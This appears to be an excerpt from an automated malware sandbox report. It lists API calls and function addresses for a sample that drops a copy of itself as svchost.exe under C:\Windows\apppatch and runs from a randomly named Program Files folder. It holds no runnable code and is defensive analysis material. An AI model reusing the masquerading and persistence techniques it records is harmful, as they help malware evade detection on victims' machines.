    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD3A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,9_2_02BD3A20
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004021D0: CreateFileA,DeviceIoControl,CloseHandle,0_2_004021D0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004018E0 _snprintf,memset,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,GetProcessHeap,CreateProcessWithLogonW,GetProcessHeap,HeapValidate,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,0_2_004018E0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile created: C:\Windows\apppatch\svchost.exeJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0043C0D00_2_0043C0D0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004460F00_2_004460F0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004408800_2_00440880
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044A8A00_2_0044A8A0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004239700_2_00423970
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00445A200_2_00445A20
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0043CA300_2_0043CA30
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004423400_2_00442340
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0042EB800_2_0042EB80
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00443C000_2_00443C00
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0043CC100_2_0043CC10
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0043AC300_2_0043AC30
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0040ED300_2_0040ED30
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0043A6500_2_0043A650
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044E6130_2_0044E613
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004356D00_2_004356D0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004416D00_2_004416D0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00447EDD0_2_00447EDD
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0040EF500_2_0040EF50
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004467C00_2_004467C0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004147E00_2_004147E0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004447900_2_00444790
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00408FA00_2_00408FA0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00442FA00_2_00442FA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043C0D02_2_0043C0D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004460F02_2_004460F0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004408802_2_00440880
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044A8A02_2_0044A8A0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004239702_2_00423970
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00445A202_2_00445A20
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043CA302_2_0043CA30
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004423402_2_00442340
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0042EB802_2_0042EB80
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00443C002_2_00443C00
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043CC102_2_0043CC10
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043AC302_2_0043AC30
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040ED302_2_0040ED30
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043A6502_2_0043A650
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044E6132_2_0044E613
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004356D02_2_004356D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004416D02_2_004416D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00447EDD2_2_00447EDD
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040EF502_2_0040EF50
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004467C02_2_004467C0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004147E02_2_004147E0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004447902_2_00444790
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00408FA02_2_00408FA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00442FA02_2_00442FA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDF2D02_2_02BDF2D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BEB2D02_2_02BEB2D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF82132_2_02BF8213
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE42502_2_02BE4250
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB2BA02_2_02BB2BA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BECBA02_2_02BECBA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BEE3902_2_02BEE390
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBE3E02_2_02BBE3E0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF03C02_2_02BF03C0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB8B502_2_02BB8B50
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE48302_2_02BE4830
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE68102_2_02BE6810
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BED8002_2_02BED800
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB89302_2_02BB8930
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE66302_2_02BE6630
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BEF6202_2_02BEF620
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD87802_2_02BD8780
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF17802_2_02BF1780
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BEBF402_2_02BEBF40
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF44A02_2_02BF44A0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BEA4802_2_02BEA480
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BEFCF02_2_02BEFCF0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE5CD02_2_02BE5CD0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCD5702_2_02BCD570
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A40A202_2_02A40A20
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A37A302_2_02A37A30
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A29B802_2_02A29B80
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3D3402_2_02A3D340
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A458A02_2_02A458A0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3B8802_2_02A3B880
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A410F02_2_02A410F0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A370D02_2_02A370D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A1E9702_2_02A1E970
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A306D02_2_02A306D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3C6D02_2_02A3C6D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A42EDD2_2_02A42EDD
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A496132_2_02A49613
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A356502_2_02A35650
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A03FA02_2_02A03FA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3DFA02_2_02A3DFA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3F7902_2_02A3F790
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A0F7E02_2_02A0F7E0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A417C02_2_02A417C0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A09F502_2_02A09F50
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A35C302_2_02A35C30
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3EC002_2_02A3EC00
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A37C102_2_02A37C10
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A09D302_2_02A09D30
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_009068105_2_00906810
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_0090D8005_2_0090D800
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_009048305_2_00904830
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D89305_2_008D8930
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_0090B2D05_2_0090B2D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008FF2D05_2_008FF2D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_009182135_2_00918213
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_009042505_2_00904250
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_0090E3905_2_0090E390
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D2BA05_2_008D2BA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_0090CBA05_2_0090CBA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_009103C05_2_009103C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DE3E05_2_008DE3E0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D8B505_2_008D8B50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_0090A4805_2_0090A480
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_009144A05_2_009144A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_00905CD05_2_00905CD0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_0090FCF05_2_0090FCF0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008ED5705_2_008ED570
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_009066305_2_00906630
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_0090F6205_2_0090F620
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008F87805_2_008F8780
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_009117805_2_00911780
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_0090BF405_2_0090BF40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008AB8805_2_008AB880
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008B58A05_2_008B58A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008A70D05_2_008A70D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008B10F05_2_008B10F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_0088E9705_2_0088E970
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008B0A205_2_008B0A20
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008A7A305_2_008A7A30
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_00899B805_2_00899B80
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008AD3405_2_008AD340
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008AEC005_2_008AEC00
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008A7C105_2_008A7C10
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008A5C305_2_008A5C30
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_00879D305_2_00879D30
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008B2EDD5_2_008B2EDD
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008A06D05_2_008A06D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008AC6D05_2_008AC6D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008B96135_2_008B9613
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008A56505_2_008A5650
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008AF7905_2_008AF790
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_00873FA05_2_00873FA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008ADFA05_2_008ADFA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008B17C05_2_008B17C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_0087F7E05_2_0087F7E0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_00879F505_2_00879F50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008BD8006_2_008BD800
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008B68106_2_008B6810
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008B48306_2_008B4830
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008889306_2_00888930
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008AF2D06_2_008AF2D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008BB2D06_2_008BB2D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008C82136_2_008C8213
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008B42506_2_008B4250
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008BE3906_2_008BE390
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00882BA06_2_00882BA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008BCBA06_2_008BCBA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008C03C06_2_008C03C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088E3E06_2_0088E3E0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00888B506_2_00888B50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008BA4806_2_008BA480
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008C44A06_2_008C44A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008B5CD06_2_008B5CD0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008BFCF06_2_008BFCF0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0089D5706_2_0089D570
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008BF6206_2_008BF620
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008B66306_2_008B6630
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008A87806_2_008A8780
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008C17806_2_008C1780
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008BBF406_2_008BBF40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0085B8806_2_0085B880
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008658A06_2_008658A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008570D06_2_008570D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008610F06_2_008610F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0083E9706_2_0083E970
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00860A206_2_00860A20
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00857A306_2_00857A30
